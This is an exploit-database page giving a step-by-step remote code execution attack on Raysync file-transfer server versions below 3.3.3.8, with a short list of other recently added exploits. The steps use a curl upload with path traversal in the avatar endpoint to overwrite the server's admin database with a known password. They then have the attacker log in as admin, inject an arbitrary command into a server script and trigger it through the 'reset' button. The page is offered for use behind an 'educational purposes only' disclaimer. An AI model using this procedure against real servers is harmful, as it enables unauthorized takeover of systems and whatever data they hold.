Raysync 3.3.3.8 rce Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2020-12-16 | Type : webapps | Platform : linux
This exploit / vulnerability Raysync 3.3.3.8 rce is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application on the local

environment, set admin password to 123456 , which will be write to

manage.db file.

step2: curl "file=@manage.db" http://[raysync
ip]/avatar?account=1&UserId=/../../../../config/manager.db

to override remote manage.db file in server.

step3: login in admin portal with admin/123456.

step4: create a normal file with all permissions in scope.

step5: modify RaySyncServer.sh ,add arbitrary evil command.

step6: trigger rce with clicking "reset" button

Raysync 3.3.3.8 rce


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Raysync 3.3.3.8 rce Vulnerability / Exploit